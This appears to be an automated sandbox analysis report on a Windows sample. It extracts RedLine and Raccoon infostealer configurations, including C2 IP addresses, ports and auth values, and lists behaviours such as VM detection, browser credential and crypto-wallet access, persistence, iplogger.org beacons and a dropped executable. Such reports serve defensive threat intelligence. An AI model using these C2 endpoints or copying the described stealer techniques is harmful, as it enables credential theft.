Analysis
-
max time kernel
105s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
-
submitted
09-08-2022 08:45
General
-
Target
125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe
-
Size
890KB
-
MD5
185b09878a7c9be2f5ab261f5244a8a0
-
SHA1
2255e5050fc8867ecc7974727dfcad2eb1d8aca0
-
SHA256
125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2
-
SHA512
bf9cc4ec025fbacf2c8faaca3f5eb5fda4adb59e2db4bc6ff015f10361e2f54369d597985da72152103fba19eefe3cc762e6b4ca5be413a454c6c1454570967b
Malware Config
Extracted
redline
nam3
103.89.90.61:18728
-
auth_value
64b900120bbceaa6a9c60e9079492895
Extracted
redline
4
31.41.244.134:11643
-
auth_value
a516b2d034ecd34338f12b50347fbd92
Extracted
redline
@tag12312341
62.204.41.144:14096
-
auth_value
71466795417275fac01979e57016e277
Extracted
redline
5076357887
195.54.170.157:16525
-
auth_value
0dfaff60271d374d0c206d19883e06f3
Extracted
redline
alfa
46.175.148.142:32178
-
auth_value
5f6c4b42c0bce31d7557ce1726a401c5
Extracted
raccoon
f0c8034c83808635df0d9d8726d1bfd6
http://45.95.11.158/
Extracted
raccoon
afb5c633c4650f69312baef49db9dfa4
http://77.73.132.74
Signatures
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Raccoon Stealer payload 6 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 15 IoCs
-
Enumerates VirtualBox DLL files 2 TTPs 10 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
-
Looks for VirtualBox executables on disk 2 TTPs 3 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 13 IoCs
-
Looks for VMWare drivers on disk 2 TTPs 3 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 12 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 49 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe"C:\Users\Admin\AppData\Local\Temp\125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,17767413840200284536,5828161942537074106,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,17767413840200284536,5828161942537074106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,11770811137516348281,4843849023375438019,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,11770811137516348281,4843849023375438019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RLtX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11887193749477432366,14851517912531595843,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11887193749477432366,14851517912531595843,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16592053720459048573,16019932122781940056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,16592053720459048573,16019932122781940056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1nfDK42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,143610837064834116,16583740783386230664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,143610837064834116,16583740783386230664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AbtZ42⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xb4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8100 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff694bd5460,0x7ff694bd5470,0x7ff694bd54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1n6sL42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,8979061879212629283,807440930091685079,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8979061879212629283,807440930091685079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RqtB42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13084215389252216617,11879332690124497779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13084215389252216617,11879332690124497779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
